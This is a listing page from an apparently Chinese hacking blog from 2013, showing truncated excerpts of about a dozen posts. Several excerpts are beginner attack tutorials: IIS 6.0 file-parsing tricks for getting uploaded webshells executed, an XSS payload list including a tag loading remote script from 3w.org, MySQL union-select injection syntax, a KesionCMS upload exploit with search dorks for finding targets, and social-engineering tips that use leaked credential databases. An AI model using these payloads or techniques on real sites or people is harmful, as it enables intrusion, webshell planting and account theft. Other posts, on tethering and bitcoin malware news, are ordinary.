七行者博客 - 关注网络安全,黑客技术爱好者

  • 各大网站服务器iis解析漏洞总汇

    各大网站服务器iis解析漏洞总汇
    各大网站服务器iis解析漏洞总汇 [+]IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0都会把此类后缀文件成功解析为 asp 文件。默认解析:/xx.asa /xx.cer /xx.cdx IIS6.0默认的可执行文件除了 asp 还包含这三种此处...阅读全文
    作者:qxz_xp | 发布:2013年12月11日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • 笔记本电脑利用手机流量上网方法

    笔记本电脑利用手机流量上网方法
           你有没有遇到过这样的烦恼?出差时在火车上遇到紧急事情需要上网或者出差住的酒店网络不给力没法办公等等,虽然我们拥有一台Android智能手机,但是不能完全满足我们的需要,甚至严重影响了我们的工作。下面我来教大家电脑利用手机流量上网的方法。 首先电脑要支持无线连接,笔记本的话是肯定有无线网链接啦,台式机的话就要装无线网卡了。 大家都知道智能机都应该有 ...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:其它技术, 电脑维修 | 暂无评论
    阅读全文

  • xss跨站脚本攻击汇集

    xss跨站脚本攻击汇集
    xss跨站脚本攻击汇集 (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号)...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 谈谈各种解析漏洞总结

    谈谈各种解析漏洞总结
    一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /qxz.asp/qxz.jpg 2.文件解析 qxz.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 qxz.asp,那么 /qxz.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 十二条技巧保护好自己防止社工

    十二条技巧保护好自己防止社工
    社工的强大大家都应该知道吧,玩黑,就要时刻做好防止被社工的心理准备,下面给大家12条方法来防止社工。 1、首先记住这句话:永远不要承认自己是个黑客或者说自己是个高手,因为这个称号是要付出代价的。 2、接到陌生电话后,一定要问清楚对方有什么事情,然后再告诉他(她)当前你目前所在的地理位置。 3、永远不要试图通过手机短信或者常用的QQ来解决某个问题,对方很...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:社工相关, 黑客攻防 | 暂无评论
    阅读全文

  • PHPMYSQL手工注射语法精选

    PHPMYSQL手工注射语法精选
    前面讲过了关于asp的手工注入,这里在讲下关于PHP网站的手工注入 关于PHP的网站程序本人了解不多,这里我就把我所知道的给大家写出来。 前面已经有讲过关于ASP的注入方法,这里我也就不说的那么详细了,只是写出一些注入语法, 不是很全面,但是是一般常用的。 暴字段长度  Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3...阅读全文
    作者:qxz_xp | 发布:2013年12月08日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 科汛任意用户上传漏洞(IIS6.0解析漏洞)

    科汛任意用户上传漏洞(IIS6.0解析漏洞)
    科汛网站程序任意用户上传漏洞利用, 主要也要用到iis6.0的解析漏洞,如果服务器是其他版本的IIS则无效。 搜索关键字: Powered By KesionCMS V5.5 inurl:User/UserReg.asp inurl:User/UserReg.asp intitle:新会员注册 打开网站的注册页面,注册一个账户,然后直接跳到KS_Editor/SelectUpFiles.asp页面,上传大马,注意大马后缀名为 x.asp;x.jpg或者x.asa;x.jpg的格式,自动命...阅读全文
    作者:qxz_xp | 发布:2013年12月07日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 关于社会工程学攻击的一次探索(上)

    关于社会工程学攻击的一次探索(上)
    在这篇文章中将讨论社会工程学攻击,很明显,首先遇到的问题就是:“什么是社会工程学”和“这些攻击有那些类型”。当然更有趣的是本文中将介绍使用者些技巧的黑客而不是使用像SET的方式攻击。本文的目标是展现一个潜在的黑客使用不同的攻击方式。 在信息安全学的背景下,社会工程学是一种操纵相关人员泄露出机密信息的艺术,建立在使人决断产生认知偏差的基础上,有时候这些偏...阅读全文
    作者:qxz_xp | 发布:2013年12月07日 | 分类:社工相关, 黑客攻防 | 暂无评论
    阅读全文

  • 疯狂的比特币:黑客乌托邦与现实失乐园

    疯狂的比特币:黑客乌托邦与现实失乐园
    自从互联网诞生以来,网络世界的黑客们就一直梦想超越传统的国别差异、地理限制、社会制度,创建一个信息自由、开放与大同的虚拟世界“乌托邦”。   电子邮件跨越了传统的地理界限,谷歌搜索实现了信息的自由流动,Facebook让世界成为一个社交村落,移动互联网让沟通无所不在。这些互联网技术的创新颠覆了传统意义上人与人、人与社会之间的交互方式,也给社会与经济发展带...阅读全文
    作者:qxz_xp | 发布:2013年12月06日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 部分简单的社会工程学要点

    部分简单的社会工程学要点
    1.社会工程学的定义不是你简简单单的网上搜索出受害人的一些信息,这甚至连狭义的社会工程学都不算。你要进行的活动是不局限于狭义社会工程学,你要与受害人或者信息拥有者进行一些深层次的交互式行为。 ①这中间要充分利用已知信息,特别是在搜索引擎中延伸出来的信息,增加信任度。比如利用谷歌地图探知其周边环境情况或者了解受害人的人际关系和在网络上的活跃程度等。 ②...阅读全文
    作者:qxz_xp | 发布:2013年12月06日 | 分类:社工相关, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 比特币“挖矿木马”一个月变种近万个

    比特币“挖矿木马”一个月变种近万个
     360互联网安全中心最新发布的风险提示称,比特币投资者正面临比特币“挖矿木马”、投资账户盗号以及交易市场沦陷三类威胁;普通网民也存在被木马控制电脑“挖矿”的风险,三季度平均每月新增比特币“挖矿木马”变种近万个。   360安全中心近期发布的《2013年第三季度个人电脑上网安全报告》显示,任何人都可以下载运行比特币客户端,参与制造比特币,这个过程也被形象地称为“挖矿”。...阅读全文
    作者:qxz_xp | 发布:2013年12月06日 | 分类:最新资讯, 网络安全 | 暂无评论
    阅读全文

  • 谈谈社会工程学的一些思路

    谈谈社会工程学的一些思路
              黑客社工的方法有很多种,首先听说最近卡乐购的卡盟比较活跃,那我就大体的讲一下如何社工卡盟卡盟站长一般都是那种MC非主流,到处注册的账号多了去了。         下面我们来谈谈社工分站的,以后会给大家分享一次我社工主站卡盟的。         首先先去查裤子,可能性不是没有,因为他们注册的论坛账号挺多的。我就用裤子搞过3、4个。         还有一种比较常用的,现...阅读全文
    作者:qxz_xp | 发布:2013年12月06日 | 分类:社工相关, 黑客攻防 | 暂无评论
    阅读全文